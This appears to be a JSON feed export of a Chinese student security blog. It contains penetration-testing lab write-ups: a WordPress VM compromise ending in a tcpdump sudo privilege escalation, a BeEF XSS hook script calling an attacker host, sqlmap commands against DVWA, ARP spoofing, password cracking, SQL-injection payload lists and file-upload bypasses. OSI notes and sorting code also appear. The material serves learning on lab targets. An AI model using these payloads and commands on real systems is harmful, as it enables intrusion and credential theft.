![](\"1.png\")
目的:获取靶机 Web Developer 文件 /root/flag.txt 中 flag。
\n
![](\"2.png\")
![](\"3.png\")
![](\"4.png\")
发现是使用 WordPress 搭建的网站,尝试寻找登录后台.
\n利用 wpscan 扫描
\n\n\n\n
WPScan是一个扫描WordPress漏洞的黑盒子扫描器,它可以为所有Web开发人员扫描WordPress漏洞并在他们开发前找到并解决问题。我们还使用了Nikto,它是一款非常棒的Web服务器评估工具,我们认为这个工具应该成为所有针对WordPress网站进行的渗透测试的一部分
![](\"6.png\")
发现 upload 目录,可能存在文件上传漏洞
\n![](\"7.png\")
发现后台可以尝试弱口令爆破
\n![](\"8.png\")
发现可以流量包文件,下载并分析
\n![](\"9.png\")
利用过滤发现存在明文传输信息,发现是 wp 后台登录账号密码
\n![](\"10.png\")
成功登录
\n在 msf 搜索可用 payload
\n![](\"12.png\")
该漏洞需要配合 reflex gallery 插件使用,使用需要在管理员后台安装插件
\n版本在 3.14 之前才行!
\n![](\"13.png\")
漏洞脚本弹回了 shell, 尝试获取敏感信息
\n![](\"14.png\")
访问 wp-config 配置文件找到 mysql 的账号密码,尝试使用登录.
\n\n\nssh *username@*ip
\n
![](\"16.png\")
查看权限是 webdeveloper 用户
\n无法 cat 到 root 目录
\n![](\"20.png\")
sudo -l 查看当前用户可以使用的 root 权限指令
\n发现有 tcpdump, 尝试提权
\ntouch /tmp/exploit1\n写入 shellcode
\necho 'cat /root/flag.txt' > /tmp/exploit\n赋予可执行权限
\nchmod +x /tmp/exploit\n利用 tcpdump 执行任意命令
\nsudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root\n获得 flag
\n![](\"21.png\")
实验环境:存在 xss 漏洞的留言板,IIS 虚拟机,Kali
\n
可以看到你开默认模式的话会有大量的测试 payload 写入留言板
\n所以在实战扫描时要注意,扫描但🔒不要破坏资产
\n
\n\n打开终端启动 beef-xss 会自动生成恶意文件
\n并通过跨站运行脚本的形式操控被攻击者
\n
<script src="http://192.168.0.135:3000/hook.js"></script>\n
![](\"5.png\")
\n\nXSS 有三种类型
\n1. 反射型
\n反射型 XSS 一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。
\n对于访问者而言是一次性的,具体表现在我们把我们的恶意脚本通过 URL 的方式传递给了服务器,而服务器则只是不加处理的把脚本 “反射” 回访问者的浏览器而使访问者的浏览器执行相应的脚本。反射型 XSS 的触发有后端的参与,要避免反射性 XSS,必须需要后端的协调,后端解析前端的数据时首先做相关的字串检测和转义处理。
\n此类 XSS 通常出现在网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进行钓鱼欺骗。
\n2. 存储型
\n攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存型 XSS 的危害会更大。
\n存储型 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。
\n3.Dom 型
\n客户端的脚本程序可以动态地检查和修改页面内容,而不依赖于服务器端的数据。例如客户端如从 URL 中提取数据并在本地执行,如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本,而这些脚本没有经过适当的过滤和消毒,那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等。
\n
本次实验是存储型 XSS 漏洞
\n实验环境搭建。启动 Metasploitable2 虚拟机。
\n用 kali 访问 Metasploitable2 的 dvwa
\n在输入框输入 1,返回
\nID: 1
\nFirst name: admin
\nSurname: admin
\n返回正常;
\n再次输入 1',报错,返回
\nYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
\n此时可以断定有 SQL 注入漏洞,
\n下面利用 SQLMap 进行注入攻击。将 DVWA 安全级别设置为最低;
\n因为需要登陆到 dvwa 所以需要获取到 cookies (f12)
\n
![\"img\"](\"../source/assets/clip_image004.jpg\")
\n\nsqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -b --current-db --current-user
\n
\n\nsqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -D dvwa --string="Surname" --users --password
\n
![](\"11.png\")
![\"img\"](\"../source/assets/clip_image006.jpg\")
--dbs:枚举当前数据库
\n\n\nsqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' --dbs
\n
-D 数据库名:指定数据库
\n--tables:枚举指定数据库的所有表
\n\n\nsqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -D mysql -T user --columns
\n
-D:指定的数据库
\n-T:指定数据库中的数据表
\n--columns:获取列的信息
\n\n\nsqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -D mysql -T user -C user,password --dump
\n
-C:枚举数据表中的列
\n--dump:存储数据表项
\n\n\nsqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' --string="Surname" -D dvwa -T users -C user,password --dump
\n
![](\"15.png\")
文件保存在 root 文件夹需要 root 的权限才能查看,可以通过 chmod 命令更改权限。此外.local 文件是隐藏文件夹 图形化界面按下组合键 ctrl+H 显示,命令行 ls -la.
\n这次实验学习了 sqlmap 和 beef 的使用,了解了关于 sql 注入和 xss 利用的知识, 没有金刚钻别揽瓷器活学会使用工具是提高效率的第一步。之后还要探索工具背后的实现原理,这样才能做到游刃有余!
\n组内成员 实验--easyfilesharing
\n组内成员 实验——注册机
\n链接:十大经典排序算法(动画演示)
\nPNode p,q;//PNode 是结构体指针 | |
\t | |
for (p = head->next; p != NULL; p = p->next) | |
//p 赋值为数据域的第一个元素,遍历一遍 | |
for (q = p->next; q != NULL; q = q->next) | |
// 相当于是将 p 和其后的所有元素比较 | |
if(p->data>q->data)// | |
{ | |
int tp = p->data; p->data = q->data; q->data = tp; } |
PNode p,q,Min;//PNode 是结构体指针 | |
for (p = head->next; p != NULL; p = p->next) | |
// 假定 p 为所有元素的最小值 | |
for (q = p->next; q != NULL; q = q->next) | |
//p 和其后所有比较,有小于 p 的话交换位置 | |
if(p->data>q->data)// | |
{ | |
Min=q | |
} |
void QuickSort(linklist *head,linklist * tail) | |
{ | |
\t// 递归结束条件:当只有 head 与 tail 元素时结束,因为每次我们传进来 mid 其实 mid 已经不用排序,如果只有两个元素而 mid 不需要排序则递归结束 | |
\tif (head->next==tail) | |
\t{ | |
\t\treturn ; | |
\t} | |
\t//p 连接的是比 mid 小的值的链表,q 连接是比 mid 大值的链表并且包括 mid | |
\tlistPoint mid=head->next; | |
\tlistPoint p=head; | |
\tlistPoint q=mid; | |
\tlistPoint t=mid->next; | |
\tint pivot=mid->key; | |
\twhile (t!=tail) | |
\t{ | |
\t\tif (t->key<pivot) | |
\t\t{ | |
\t\t\tp=p->next=t; | |
\t\t} | |
\t\telse | |
\t\t{ | |
\t\t\tq=q->next=t; | |
\t\t} | |
\t\tt=t->next; | |
\t} | |
\t//p 链表连接上 q 链表 | |
\tp->next=mid; | |
\tq->next=tail;//q 链表尾部指向 NULL | |
\tQuickSort(head,mid);// 递归调用 QuickSort | |
\tQuickSort(mid,tail); | |
} |
C 语言链表快速排序
\n挖个坑... 未完待续...
\n", "tags": [ "数据结构" ] }, { "id": "https://sovegetable.github.io/test2/", "url": "https://sovegetable.github.io/test2/", "title": "网络渗透实验二", "date_published": "2020-11-03T15:47:15.000Z", "content_html": "\n\nip.src == ipaddress of A
\n
wireshark 过滤规则及使用方法
\n\n\n能,因为我们都是在一个网段下。网关会向所有人发送报文,不是本机 ip 会被电脑自动丢弃
\n
\n\n网关 (gateway)
\n
\n\narpspoof -i 网卡 -t 目标 ip 网关
\n
![](\"17.png\")
![](\"18.png\")
密码是 base64 加密,相当于~ 无~
环境:两台同网段的虚拟机 kali & unbuntu
\n1. 启动 arpspoof 实施 arp 欺骗,让本机冒充网关收发数据
\necho 1 > /proc/sys/net/ipv4/ip_forward | |
首先开启数据包转发(linux) |
![](\"131.png\")
2.wireshark 查看截获的数据
\n
3. 过滤报文
\n
= 看到用户在 http 下的明文数据 =
\n\n\nFTP 支持两种模式,一种方式叫做 Standard (也就是 PORT 方式,主动方式),一种是 Passive (也就是 PASV,被动方式)。 Standard 模式 FTP 的客户端发送 PORT 命令到 FTP 服务器。Passive 模式 FTP 的客户端发送 PASV 命令到 FTP Server。
\n
FTP 服务器向用户询问密码,所以判断 192.168.182.1 是 FTP 服务器
\n
\n\n可以看到有两次登录第一次失败了,第二次成功了
\n账号:student 密码:sN46i5y
\n
\n\n压缩包:1.zip
\n文件:复习题.txt
\n
\n\n文件传输层用的是 tcp 协议,ip 是 ftp 服务器
\n之后再查找压缩文件头 HEX 504B
\n可以看到 1.zip
\n
\n\n追踪 tcp 数据流然后保存下来解压,发现有密码。
\n尝试破解
\n这里使用的是 ARCHPR
\n
还好密码比较简单,之前暴力破解一个 zip 一个晚上都没出结果
\n随缘😂
\n
还原后的图片
\n密码:123456
\n
\n\ntxt 文件没有 HEX 数据头,所以跟踪到文件
\n
FTP DATA 中存有 txt 的原始数据
\n那么,口令的明文是什么?(提示:MD5 值破解)
\n\n\n明文:iampotato
\nMD5 值目前的技术很难破解,一般采取 “碰撞” 的方式破解
\n
网页链接:MD5 是什么?
\n\n\nJohn the Ripper 是一个暴力破解密码的软件
\n采用的是字典爆破模式,可导入用户自己的字典
\n
网页链接:密码破解利器 John the Rippe 使用详细
\narp 欺骗原理
\n静态网关地址
\n比较冗长我总结一下
\n1. 不使用弱密码
\n2. 不重复使用密码
\n3. 密码难度依据重要程度而定
\n安全密码三原则
\n一个好的密码字典决定了破解的成功与否,好的密码字典要命中率高,所以最好的字典是根据个人的特性设计的,这样成功率会高一点。字典的重要性:字典中没有你要的密码的话都是白瞎!
\n本次试验我了解到了 arp 欺骗的原理,认识了 ftp 服务,知道了何为 MD5,但是都是简单的复现和认识。要灵活自如的上手还没有达到那个水平。在实验中 arpspoof 做 arp 欺骗成功了,网关和欺骗者 mac 地址相同,之后开启转发但是依旧失败。
\n安全路上上道阻且长,加油吧骚年!
\n渗透测试实验一
\n
![\"avater\"](\"ns.jpg\")
根据图片上的信息可以确定咖啡馆的名称,通过 google 地图可以查到地址为 38 Avenue de Suffren, 75015 Paris
\n虽然店铺装潢已经变了,但是还是可以通过图片中的披萨店和 2 楼窗台确定的![\"avater\"](\"123.png\")
获取自己手机的 LAC 和 CID:
\nAndroid 获取方法:Android: 拨号 *##4636##* 进入手机信息工程模式后查看
\niphone 获取方法:iPhone:拨号 * 3001#12345#* 进入 FieldTest
\nServing Cell info–>LAC=Tracking Area Code -->cellid = Cell identity
\n若不能获取,用右图信息。
\n截图你查询到的位置信息。
\n![\"img\"](\"../source/assets/clip_image002.jpg\")
1、注入点发现。首先肯定是要判断是否有注入漏洞。实验应用原理\n![\"avater\"](\"sl.png\")
通过 LAC 反查可以获取到位置信息
\n![\"avater\"](\"wz.png\")
![\"avater\"](\"wz2.png\")
![\"avater\"](\"312.png\")
![\"avater\"](\"134.png\")
![\"avater\"](\"133.png\")
不同,因为我们获取到的是公网地址,而ipconfig获取的是内网(相对于公网ip下)因为用了NAT地址转换技术\n网页链接:nmap 基本步骤
\n nmap -sP 192.168.0.0/24 扫描存活\n nmap 192.168.xxx.xxx 发现存活主机后扫描端口\n namp -O 192.168.xxx.xxx 查看操作系统\n![\"avater\"](\"fuwu.png\")
![\"avater\"](\"os.png\")
\t\t访问 ip 发现 80 有 http 服务发现了 dvwa 的登录界面
\n\t![\"avater\"](\"dvwa.png\")
然后使用 nmap 自带的爆破脚本进行弱口令爆破
\nnmap -p80 --script=http-form-brute --script-args=http-form-brute.path=/dvwa/login.php 192.168.37.189\n![\"avater\"](\"bp.png\")
Over!拿到登录账号和密码
\nWannaCry 勒索病毒主要行为是传播和勒索。
\n搜索 simens 发现有很多工控设备开启了 ssh 服务和 telnet 服务,若无管理则有被爆破的风险。
\n常见文件头汇总
\njpg 的 hex 头尾 FFD8 修复一下就好
\n![\"avater\"](\"167.png\")
![\"avater\"](\"168.png\")
修复后文件:
\n![\"avater\"](\"2.jpg\")
\n\n用 binwalk 二进制分析可以看到有两张图片(错乱)
\n
![\"avater\"](\"169.png\")
![\"avater\"](\"170.png\")
![\"avater\"](\"173.png\")
虽然两张图片一样大但是清晰度和大小比例均不如原图,可能是 ps 做出来的文件里面用的源文件吧.......😂
\n![\"avater\"](\"166.png\")
Tom is the killer.. 🔪
\n以前使用过 easyrecovery 修复随身听的歌曲,不过只成功了一部分,有一些坏道还是不能修复。
\n知乎:数据恢复原理
\n2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS
\n 前台任意用户密码修改漏洞的细节。
\n2018 年 1 月 10 日,Seebug 漏洞平台收录该漏洞,漏洞编号为
\n SSV-97074,知道创宇 404 漏洞应急团队成功复现该漏洞。
形成原因:
\n限制:
\n只影响前台账户
\n只能修改未设置安全问题的账户
\n1. 首先使用 phpstudy 搭建本地服务并安装织梦 cms
\n在建站是遇到一些问题没有办法访问
\n解决方案:在 [hosts].{label} 中手动添加
\n
要把会员功能开放并且无密保问题
\n
[注意一个账号只能访问改密码页面一次,否则要等 10 分钟 key 失效].
\n
![](\"12.jpg\")
到此漏洞复现成功
\n![](\"14s.png\")
直接访问该链接,即可重置admin前台为任意密码。 | |
重置admin前台密码之后,注意不要退出,继续留着cookie,继续进行修改admin后台密码 |
访问:系统设置 -> 个人资料 -> 基本资料
\n即
http://192.168.170.139/member/edit_baseinfo.php\n
进行后端密码更改之前,不能纯用 bp 发报文。这样浏览器拿不到重要 cookies 会导致无法依靠 cookie 使 admin 前台登录(登录界面禁用 admin 直接登录)
\n网页链接:DeDeCMS v5.7 {SP1,SP2} 密码修改漏洞(附 PoC)
\n", "tags": [ "homework" ] }, { "id": "https://sovegetable.github.io/qqshark/", "url": "https://sovegetable.github.io/qqshark/", "title": "qq流量包分析", "date_published": "2020-10-17T13:36:36.000Z", "content_html": "使用工具 :Wireshark
\n![](\"../source/assets/u=3726352782,2540904049&fm=26&gp=0.jpg\")
\n\n本来是是一张 1.6MB 的完整的图,流量截取后 出现错误
\n
\n\n尝试了很多次发现只有大图片会发生不完整,推测是分成了两部分或多部分传输
\n
\n\n意外抓到了别人的图,是因为 wifi 抓包的缘故(无线信号)
\n
\n\n输入判断条件:tcp and ip.dst==192.168.0.19
\n
\n\nhex 搜索: ffd8
\n
找到文件拖到本地还原
\n
删除多余的报文 header,还原图片
\n
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=' 库名 ' LIMIT 0,1 // 爆表(一次一个)
\nselect group_concat (table_name) from information_schema.tables where table_schema=0x7365637572697479 // 爆表 (全部)前面是数据库 16 进制的编码
\nselect group_concat (column_name) from information_schema.columns where table_name=0x656d61696c73 // 爆字段 前面是数据库 16 进制的编码
\nselect group_concat (id 字段名 1,email_id 字段名 2 。。。。) from email(表名)// 爆单个数据
\n首先利用盲注的方法获取表名等,然后报错注入回显。(针对页面无回显点)
\nid=-1' OR 1 GROUP BY CONCAT_WS (0x3a,database (),FLOOR (RAN (0)*2)) HAVING MIN (0) OR 1 --+ // 库
\nhttp://sql.com/Less-5/?id=1' and extractvalue (1,concat (0x23,(select table_name from information_schema.tables where table_schema=database () limit 0,1),0x23))--+// 表
\nhttp://sql.com/Less-5/?id=1' and extractvalue (1,concat (0x23,(select column_name from information_schema.columns where table_schema=database () and table_name='users' limit 0,1),0x23))--+ // 字段
\nhttp://sql.com/Less-5/?id=1' and length ((select table_name from information_schema.tables where table_schema=database () limit 0,1))>6--+// 长度判断
\nhttp://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 通过二分法猜解得到所有的库,红色为可变参数。
\nhttp://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ 再次通过二分法可猜解得到 security 下的所有表。其中,红色为可变参数。
\nhttp://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ 通过二分法可猜解 users 内的字段,其中红色为可变参数。
\nhttp://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select username from security.users limit 1,1),1,1))>1--+ 继续猜解即可得到字段内的值。
\n", "tags": [] }, { "id": "https://sovegetable.github.io/OSI%E4%B8%83%E5%B1%82%E5%8D%8F%E8%AE%AE/", "url": "https://sovegetable.github.io/OSI%E4%B8%83%E5%B1%82%E5%8D%8F%E8%AE%AE/", "title": "What is OSI七层协议", "date_published": "2020-08-12T16:00:00.000Z", "content_html": "\n
用于传输介质中提供物理连接,实现比特流的透明传输。物理层的作用是实现相邻计算机节点之间比特流的透明传送,尽可能屏蔽掉具体传输介质和物理设备的差异。使其上面的数据链路层不必考虑网络的具体传输介质是什么。“透明传送比特流” 表示经实际电路传送后的比特流没有发生变化,对传送的比特流来说,这个电路好像是看不见的。
\n负责建立和管理节点间的链路。该层的主要功能是:通过各种控制协议,将有差错的物理信道变为无差错的、能可靠传输数据帧的数据链路。
\n在计算机网络中由于各种干扰的存在,物理链路是不可靠的。因此,这一层的主要功能是在物理层提供的比特流的基础上,通过差错控制、流量控制方法,使有差错的物理线路变为无差错的数据链路,即提供可靠的通过物理介质传输数据的方法。
大致是用于局域网里的根据端口的 MAC 地址做转发的协议
\n主要功能是控制子网的运行。通过路由选择算法,为报文或分组通过通信子网选择最适当的路径。该层控制数据链路层与传输层之间的信息转发,建立、维持和终止网络的连接。具体地说,数据链路层的数据在这一层被转换为数据包,然后通过路径选择、分段组合、顺序、进 / 出路由等控制,将信息从一个网络设备传送到另一个网络设备。
\n一般地,数据链路层是解决同一网络内节点之间的通信,而网络层主要解决不同子网间的通信。例如在广域网之间通信时,必然会遇到路由(即两节点间可能有多条路径)选择问题。
选择最好的路由线路,已获得最好的速度,比如有三条路可以走这层协议负责选取最短的路径。
\n该层的主要任务是:向用户提供可靠的端到端的差错和流量控制,保证报文的正确传输。传输层的作用是向高层屏蔽下层数据通信的细节,即向用户透明地传送报文。该层常见的协议:TCP/IP 中的 TCP 协议、Novell 网络中的 SPX 协议和微软的 NetBIOS/NetBEUI 协议。
\n传输层提供会话层和网络层之间的传输服务,这种服务从会话层获得数据,并在必要时,对数据进行分割。然后,传输层将数据传递到网络层,并确保数据能正确无误地传送到网络层。因此,传输层负责提供两节点之间数据的可靠传送,当两节点的联系确定之后,传输层则负责监督工作。综上,传输层的主要功能如下:
\n传输连接管理:提供建立、维护和拆除传输连接的功能。传输层在网络层的基础上为高层提供 “面向连接” 和 “面向无接连” 的两种服务。
\n处理传输差错:提供可靠的 “面向连接” 和不太可靠的 “面向无连接” 的数据传输服务、差错控制和流量控制。在提供 “面向连接” 服务时,通过这一层传输的数据将由目标设备确认,如果在指定的时间内未收到确认信息,数据将被重发。
\n监控服务质量。
负责数据包的重组和排序,从网络层获取的碎片式的数据包重新排序成原文。
\n主要任务是:向两个实体的表示层提供建立和使用连接的方法。将不同实体之间的表示层的连接称为会话。因此会话层的任务就是组织和协调两个会话进程之间的通信,并对数据交换进行管理。
\n会话层的具体功能如下:
\n会话管理:允许用户在两个实体设备之间建立、维持和终止会话,并支持它们之间的数据交换。例如提供单方向会话或双向同时会话,并管理会话中的发送顺序,以及会话所占用时间的长短。
\n会话流量控制:提供会话流量控制和交叉会话功能。
\n寻址:使用远程地址建立会话连接。
\n出错控制:从逻辑上讲会话层主要负责数据交换的建立、保持和终止,但实际的工作却是接收来自传输层的数据,并负责纠正错误。会话控制和远程过程调用均属于这一层的功能。但应注意,此层检查的错误不是通信介质的错误,而是磁盘空间、打印机缺纸等类型的高级错误。
为两端通信实体建立连接(会话),中间有认证鉴权以及检查点记录(供会话意外中断的时候可以继续,类似断点续传)。
\n其主要功能是 “处理用户信息的表示问题,如编码、数据格式转换和加密解密” 等。表示层的具体功能如下:
\n数据格式处理:协商和建立数据交换的格式,解决各应用程序之间在数据格式表示上的差异。
\n数据的编码:处理字符集和数字的转换。例如由于用户程序中的数据类型(整型或实型、有符号或无符号等)、用户标识等都可以有不同的表示方式,因此,在设备之间需要具有在不同字符集或格式之间转换的功能。
\n压缩和解压缩:为了减少数据的传输量,这一层还负责数据的压缩与恢复。
\n数据的加密和解密:可以提高网络的安全。
决定数据的展现(编码)形式,如同一部电影可以采样、量化、编码为 RMVB、AVI,一张图片能够是 JPEG、BMP、PNG 等。
\n它是计算机用户,以及各种应用程序和网络之间的接口,其功能是直接向用户提供服务,完成用户希望在网络上完成的各种工作。它在其他 6 层工作的基础上,负责完成网络中应用程序与网络操作系统之间的联系,建立与结束使用者之间的联系,并完成网络用户提出的各种网络服务及应用所需的监督、管理和服务等各种协议。此外,该层还负责协调各个应用程序间的工作。
\n如邮箱使用的 POP3,SMTP、远程登录使用的 Telnet、获取 IP 地址的 DHCP、域名解析的 DNS、网页浏览的 http 协议等;这部分协议主要是规定应用软件如何去进行通信的。
\n由于 OSI 是一个理想的模型,因此一般网络系统只涉及其中的几层,很少有系统能够具有所有的 7 层,并完全遵循它的规定。
\n在 7 层模型中,每一层都提供一个特殊的网络功能。从网络功能的角度观察:下面 4 层(物理层、数据链路层、网络层和传输层)主要提供数据传输和交换功能,即以节点到节点之间的通信为主;第 4 层作为上下两部分的桥梁,是整个网络体系结构中最关键的部分;而上 3 层(会话层、表示层和应用层)则以提供用户与应用程序之间的信息和数据处理功能为主。简言之,下 4 层主要完成通信子网的功能,上 3 层主要完成资源子网的功能。
第一关:
\n前端 js 函数白名单过滤
\n方法 1:BP 抓包改文件,先把 php 后缀改成白名单里的,然后抓包在改回来绕过前端
\n方法 2:在浏览器设置里关闭 js 函数
\n方法 3:在 consel 里运行改过的 html 源码(亲测未成功,js 路径报错)
第二关:
\n对于 content-type 的检验
\n BP 将 text/plain 改为 image/gif
第三关:
\n黑名单后缀
\n用类似等效的后缀代替(亦或是大小写)
\n比如说:.phtml .phps .php5 .pht,但如果上传的是.php5 这种类型文件的话,如果想要被当成 php 执行的话,需要有个前提条件,即 Apache 的 httpd.conf 有如下配置代码
\n大小写都可 如.PhP .pHP (亲测失败)
第四关:
\n更全的黑名单
\n.htaccess,于是首先上传一个.htaccess 内容如下的文件:
\nSetHandler application/x-httpd-php
\n 这样所有文件都会解析为 php,然后再上传图片马,就可以解析:
第五关:
\n黑名单,加上了.htaccess,但是没有将后缀进行大小写统一,于是可以通过大小写绕过,在 content-disposition filename=xxx.phP
Welcome to Hexo! This is your very first post. Check documentation to learn how to use.
\n", "tags": [] } ] }